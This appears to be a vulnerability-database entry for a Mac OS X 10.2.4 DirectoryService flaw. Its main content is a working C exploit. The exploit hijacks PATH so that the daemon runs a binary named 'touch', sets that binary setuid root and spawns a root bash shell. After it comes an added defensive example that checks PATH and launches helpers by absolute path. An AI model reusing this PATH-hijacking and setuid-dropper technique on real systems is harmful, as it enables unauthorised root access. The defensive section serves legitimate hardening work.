Vendor: Mac OS X
By: Neeko Oni
CVSS: 7.5 HIGH
Denial of Service
CWE: 400
Product Name: Mac OS X
Affected Version From: OS X <= 10.2.4
Affected Version To: OS X <= 10.2.4
Patch Exists: YES
Related CWE: N/A
CPE: o:apple:mac_os_x:10.2.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Mac OS X
2002

MacOSX DirectoryService Denial of Service Vulnerability

It has been reported that a remote attacker may trigger an exception in DirectoryService by repeatedly connecting to specific network ports. Exploit code has been provided that, once DirectoryService has been crashed or killed, can be compiled as 'touch' and executed locally to gain root access.

Mitigation:

Restrict access to the vulnerable ports and apply the latest security patches.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/7323/info

MacOSX DirectoryService has been reported prone to a denial of service vulnerability.

It has been reported that a remote attacker may trigger an exception in
DirectoryService by repeatedly connecting to specific network ports. 

/* 
   OS X <= 10.2.4 DirectoryService local root PATH exploit
   DirectoryService must be crashed prior to execution, per
   @stake advisory.  If you discover how to crash DirectoryService
   e-mail me at neeko@haackey.com  [Neeko Oni]

[Copying and pasting code does not make you cool, no matter how many
dollars per hour you make.  Sorry.]

--
Assuming DirectoryService has been crashed/killed, compile
this code as 'touch' (gcc osxds.c -o touch) and execute.

bash$ ./touch
*bunch of stuff here*
euid is root.
bash#

*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

int 
main(int argc, char **argv)
{
	char           *ORIGPATH;
	int             temp;
	if (argc < 2) {
		if (geteuid() == 0) {
		printf("euid is root.\n");
		setuid(0);
		execl("/bin/bash", "bash", NULL);
		}
		strcpy(ORIGPATH, getenv("PATH"));
		printf("Original path: %s\n", ORIGPATH);
		setenv("PATH", ".", 1);
		printf("New path: %s\n", getenv("PATH"));
		printf("Executing DirectoryService with false PATH...\n");
		if (fork() == 0) {
			execl("/usr/sbin/DirectoryService", "DirectoryService", NULL);
		}
		printf("Forked DirectoryService, pausing before shell exec...\n");
		sleep(3);
		printf("Cross your fingers.\n");
		setenv("PATH", ORIGPATH, 1);
		printf("Path restored: %s\n", getenv("PATH"));
		execl("./touch", "touch", NULL);		
	}
system("/usr/sbin/chown root ./touch;/bin/chmod +s ./touch");
}
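
The exploit above sets PATH to "." and is compiled as 'touch' before it starts DirectoryService, which only pays off if the privileged daemon launches a helper by bare name through a PATH search. The following added example (not from the original page or from Apple's code) shows the defensive counterpart: auditing PATH for relative or empty entries, and launching helpers by absolute path with a fixed environment. The names path_is_safe and spawn_trusted and the fixed PATH value are assumptions for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* 1 only if every PATH entry is absolute; an empty entry (leading, trailing
   or doubled ':') means the current directory and is rejected like ".". */
int path_is_safe(const char *path)
{
	const char *p = path;
	if (p == NULL || *p == '\0')
		return 0;
	for (;;) {
		if (*p != '/')
			return 0;
		p = strchr(p, ':');
		if (p == NULL)
			return 1;
		p++; /* start of the next entry */
	}
}

/* Run a helper by absolute path with a fixed environment (the PATH value is an
   assumed trusted default); returns its exit status, or -1 if refused/abnormal. */
int spawn_trusted(const char *abs_path, char *const argv[])
{
	static char *const fixed_env[] = { "PATH=/usr/bin:/bin", NULL };
	int status;
	pid_t pid;
	if (abs_path == NULL || abs_path[0] != '/')
		return -1; /* a bare name such as "touch" would need a PATH search */
	if ((pid = fork()) < 0)
		return -1;
	if (pid == 0) {
		execve(abs_path, argv, fixed_env); /* no search, no inherited env */
		_exit(127);
	}
	if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
		return -1;
	return WEXITSTATUS(status);
}

int main(void)
{
	char *probe[] = { "sh", "-c", "test \"$PATH\" = /usr/bin:/bin", NULL };
	setenv("PATH", ".", 1); /* constructed hostile environment */
	printf("caller PATH safe: %d\n", path_is_safe(getenv("PATH")));
	return spawn_trusted("/bin/sh", probe); /* 0 when the child saw the fixed PATH */
}
```

A setuid or root-started program that applies both checks is unaffected by whatever PATH its caller exported, because the helper is never resolved through a search and the child never inherits the caller's environment.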